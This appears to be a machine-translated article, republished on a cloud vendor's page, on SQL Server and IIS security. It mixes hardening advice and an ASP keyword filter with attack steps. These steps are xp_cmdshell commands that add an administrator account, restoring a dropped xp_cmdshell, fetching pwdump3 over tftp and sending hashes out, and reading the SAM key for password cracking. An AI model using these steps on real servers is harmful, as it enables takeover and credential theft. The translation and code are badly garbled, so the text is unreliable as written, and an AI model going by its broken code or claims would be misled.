Security from IIS to SQL Server database

Source: Internet
Author: User
Keywords Security SQL Server iis
From CodeRED to Nimda and so on, a lot of worms to the original need to manually use the vulnerability into a program automatically use, do you want to manually operate these IIS vulnerabilities? Let's adjust the center of gravity to see the database used by the server. General Web sites are based on the database, especially ASP, PHP, JSP, such as the use of the database to dynamically display the site. Many web sites may be more aware of operating system vulnerabilities, but the database and the security of these scripts are always ignored, and not much attention. Starting with the most common scripting issues, these are old topics, and you can refer to hectic's "simple intrusion of databases and rogue vandalism, as an example of a letter to Heaven," which is very detailed from the SQL scripting question. For the security of the script can also be implemented through filtering, you can refer to what I have previously written. For ASPs, you can use the following filter function: function Filter_sql (strdata) Dim strfilter Dim Blnflag Dim i Strfilter= ",;,//,--, @,_,exec, Declare "' need to filter the characters, you can add them yourself,", "is the separator blnflag=flase ' filter flag, if the filter is produced, then it is true Dim arrayfilter arrayfilter=split (strfilter,", ") For i=0 to UBound (arrayfilter) if Instr (Strdata,arrayfilter (i)) >0 Then blnflag=true Exit for End If Next if Blnflag the n Response.Redirect "Wrong.asp" is directed to a predetermined page when a filtering operation is found. It's not always a good thing to use a connection request that's not available for normal access anyway. Else Filter_sql=strdata End If The security issue is not limited to scripting for MS SQL Server databases. "The day kills Microsoft" The system is very strong, the entire windows-based system application has the very strong correlation, to SQL Server, the basic can equate the database management and the system management. The password for the default administrator account "SA" for SQL Server is empty, which creates a security vulnerability for most NT servers. Banyan "Sqlrcmd", you can use the access to the database administrator account to execute system commands. There are many system stored procedures in SQL Server, some are used internally by the database, and some are stored through the executionTo invoke the system command. System stored procedure: xp_cmdshell executes the given command string as the operating system command line interpreter. It is specific to the syntax: xp_cmdshell {' command_string '} [, No_output] xp_cmdshell by default, only members of the sysadmin can execute. However, sysadmin can also grant this execution permission to other users. In earlier versions, users who obtained xp_cmdshell Execute permissions ran commands in the SQL Server service's user account. You can configure SQL Server with configuration options so that users without SA access to SQL Server can run xp_cmdshell in a sqlexecutivecmdexec Windows NT account. In SQL Server 7.0, this account is called SQLAgentCmdExec. Now for SQL Server2000, you can run the command directly as long as you have an account that can execute the stored procedure. For NT and WIN2000, when the user is not a member of the sysadmin group, xp_cmdshell simulates the proxy account that uses the SQL Server agent specified by xp_sqlagent_proxy_account. If the proxy account is not available, xp_cmdshell will fail. So even if you have an account that is the db_owner of the master database, you cannot execute the stored procedure. If we have a database account that can execute xp_cmdshell, such as an SA account with a blank password. Then we can execute the command: EXEC xp_cmdshell ' net user refdom 123456/add ' exec xp_cmdshell ' net localgroup administrators ' The above two calls add a user to the system's Administrators group: Refdom when we get the SA administrator account for the database, we should be able to take full control of the machine. The importance of database security is visible. The following stored procedures are all available to public: Xp_fileexist to determine whether a file exists. Xp_getfiledetails, you can get file details. Xp_dirtree, you can expand the directory you need to know to get all the directory depth. Xp_getnetname, you can get the server name. There are also stored procedures that can manipulate the registry, which are notCan be performed, requiring system administrator or authorized execution: xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumvalues xp_regread (for public to perform) the security configuration of xp_regremovemultistring Xp_regwrite SQL Server requires the security of the database in addition to being filled with all patches by Microsoft. First, you need to strengthen the password of an account such as SA, similar to the usage configuration of the system account, do not use the most privileged account like SA, and use the general account number that satisfies your requirement. Then start the massacre of extended stored procedures, first of all, xp_cmdshell, there are a lot of stored procedures above, drop it, generally do not need. Execution: Use master sp_dropextendedproc ' xp_cmdshell ' to remove the guest account and prevent unauthorized users from accessing it. Remove unnecessary network protocols. To enhance logging of database log, it is best to record all landing events. You can use the following simple DOS command to view the log: findstr/c: "Login" D:\Microsoft SQL server\mssql\log\*.* Check all accounts regularly with the administrator account, whether the password is empty or too simple, such as the following statement: use Master Select Name,password from syslogins where Password are null use the following statement for all accounts, check execution rights for stored procedures and extended stored procedures, and beware of unnecessary execution permission proliferation: Use master S Elect sysobjects.name from sysobjects, sysprotects Where sysprotects.uid = 0 and Xtype in (' X ', ' P ') and sysobjects.id = Sy Sprotects.id strengthen the security of the database is very important, and some database servers are isolated from the Web server, this is the same as mail server, the database log may be very little to see, this will become an oversight point for administrators. Like DNS, mail, and so on, database servers tend to be the springboard for various intrusions. Here are some questions and answers about the database: 1. What if you can't execute the xp_cmdshell stored procedure after you get the SA permission? A: It is possible to have extended the xp_cmdshellThe stored procedure is deleted and you can use this stored procedure to restore the xp_cmdshell. Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll ' 2, through the database with Pwdump to obtain the system administrator password first upload a pwdump tftp-i get Pwdump3.exe Pwdump3.exe Tftp-i get Lsaext.dll lsaext.dll tftp-i get pwservice.exe pwservice.exe pwdump3 127.0.0.1 outfile.txt tftp put outfile.t XT Outfile.txt and then use decryption tool L0PHT and so on to crack these passwords. 3. Read the system administrator password from the database. Can read out the encrypted password is NT "Administrator" account can not do, SQL Server can read out is the use of "LocalSystem" account number, this account is higher than the administrator level. You can use the following stored procedure. But read the password is encrypted, and then decrypt it. Xp_regread ' HKEY_LOCAL_MACHINE ', ' Security\sam\domains\account ', ' F ' editor Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 To force (0 Votes) Tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) passing (0 Votes) Text: From IIS to SQL Server database secure return to network security home

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.